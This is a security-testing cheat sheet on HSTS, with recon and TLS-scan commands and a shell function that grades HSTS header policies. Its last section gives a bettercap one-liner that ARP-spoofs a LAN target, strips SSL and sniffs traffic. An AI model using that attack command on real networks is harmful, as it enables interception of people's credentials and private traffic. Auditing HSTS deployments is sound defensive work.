HTTP Strict Transport Security
Check List
Cheat Sheet
Recon Header
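# $WEBSITE is a bare hostname (as nmap and sslyze expect); browsers ignore the HSTS header over plain HTTP, so request HTTPS
curl -s -D- -o /dev/null "https://$WEBSITE" | grep -i strict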
nmap -sS -sV --mtu 5000 --script ssl-enum-ciphers $WEBSITE
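The `grep -i strict` check above only shows that the header is present. The following added example (not part of the original cheat sheet) grades the policy itself; the function name `hsts_grade`, the verdict labels and the one-year `MIN_MAX_AGE` threshold (the hstspreload.org minimum) are assumptions of this example.

```shell
# Added example: grade an HSTS policy from raw response headers on stdin.
# MIN_MAX_AGE is an assumption: 1 year, the hstspreload.org minimum.
MIN_MAX_AGE=31536000

hsts_grade() (
  # Keep only the first Strict-Transport-Security header (RFC 6797: UAs
  # process only the first one); header names are case-insensitive.
  line=$(tr -d '\r' | awk '!found && tolower($0) ~ /^strict-transport-security:/ {
           print; found = 1 }')
  [ -n "$line" ] || { echo "MISSING"; exit 0; }
  value=${line#*:}

  # Directives are ';'-separated, case-insensitive, and may be quoted.
  max_age="" subdomains=no preload=no
  while IFS= read -r directive; do
    directive=$(printf '%s' "$directive" | tr -d ' \t"' | tr 'A-Z' 'a-z')
    case "$directive" in
      max-age=*)         max_age=${directive#max-age=} ;;
      includesubdomains) subdomains=yes ;;
      preload)           preload=yes ;;
    esac
  done <<EOF
$(printf '%s' "$value" | tr ';' '\n')
EOF

  # max-age is the one required directive; without it the policy is void.
  case "$max_age" in
    ''|*[!0-9]*) echo "INVALID max-age missing or non-numeric"; exit 0 ;;
  esac
  detail="max-age=$max_age includeSubDomains=$subdomains preload=$preload"
  if [ "$max_age" -eq 0 ]; then
    echo "DISABLED $detail"   # max-age=0 tells the browser to drop the policy
  elif [ "$max_age" -lt "$MIN_MAX_AGE" ] || [ "$subdomains" = no ]; then
    echo "WEAK $detail"       # short lifetime or subdomains left uncovered
  else
    echo "OK $detail"
  fi
)

# Constructed sample response headers (not captured from a real site).
printf 'HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=300\r\n\r\n' | hsts_grade
# Against a live host: curl -s -D- -o /dev/null "https://$WEBSITE" | hsts_grade
```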
Scan Vulnerabilities
sslyze $WEBSITE
testssl $WEBSITE
MitM
Interface Network
INTERFACE=$(ip -o -4 addr show | awk '$2 != "lo" {print $2; exit}')
MitM on LAN
bettercap -iface $INTERFACE -eval "set arp.spoof.targets $TARGET; arp.spoof on; http.proxy on; http.proxy.sslstrip true; net.sniff on"